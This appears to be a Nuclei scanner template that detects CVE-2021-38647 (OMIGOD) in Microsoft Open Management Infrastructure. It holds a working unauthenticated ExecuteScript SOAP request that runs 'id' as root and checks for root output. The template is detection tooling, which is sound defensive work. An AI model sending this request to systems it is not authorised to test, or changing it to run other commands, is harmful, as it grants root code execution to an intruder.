80 lines
3.4 KiB
YAML
80 lines
3.4 KiB
YAML
id: CVE-2021-38647
|
|
|
|
info:
|
|
name: Microsoft Open Management Infrastructure - Remote Code Execution
|
|
author: daffainfo,xstp
|
|
severity: critical
|
|
description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD).
|
|
remediation: Updates for this vulnerability were published on GitHub on August 11, 2021.
|
|
reference:
|
|
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
|
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
|
|
- https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
|
|
- https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
|
|
- https://github.com/microsoft/omi
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-38647
|
|
cwe-id: CWE-287
|
|
epss-score: 0.97203
|
|
epss-percentile: 0.99755
|
|
cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: microsoft
|
|
product: azure_automation_state_configuration
|
|
tags: cve,cve2021,rce,omi,microsoft,kev
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wsman HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/soap+xml;charset=UTF-8
|
|
|
|
<s:Envelope
|
|
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
|
|
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
|
|
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
|
|
xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
|
|
xmlns:xsi="http://www.w3.org/2001/XMLSchema"
|
|
xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
|
|
xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
|
|
<s:Header>
|
|
<a:To>HTTP://{{Hostname}}/wsman/</a:To>
|
|
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
|
|
<a:ReplyTo>
|
|
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
|
|
</a:ReplyTo>
|
|
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
|
|
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
|
|
<a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
|
|
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
|
|
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
|
|
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
|
|
<w:OptionSet s:mustUnderstand="true"/>
|
|
<w:SelectorSet>
|
|
<w:Selector Name="__cimnamespace">root/scx</w:Selector>
|
|
</w:SelectorSet>
|
|
</s:Header>
|
|
<s:Body>
|
|
<p:ExecuteScript_INPUT
|
|
xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
|
|
<p:Script>aWQ=</p:Script>
|
|
<p:Arguments/>
|
|
<p:timeout>0</p:timeout>
|
|
<p:b64encoded>true</p:b64encoded>
|
|
</p:ExecuteScript_INPUT>
|
|
</s:Body>
|
|
</s:Envelope>
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '<p:StdOut>'
|
|
- 'uid=0(root) gid=0(root) groups=0'
|
|
condition: and
|
|
|
|
# digest: 4a0a004730450221009f944a1f3d5e4f194aa5dbd875510941608ae5b65af3f6b2275952028cbe8775022046538f07b26962c32049fe653a538247564232fb69f9f1e6d40e89aee1d2f61d:922c64590222798bb761d5b6d8e72950
|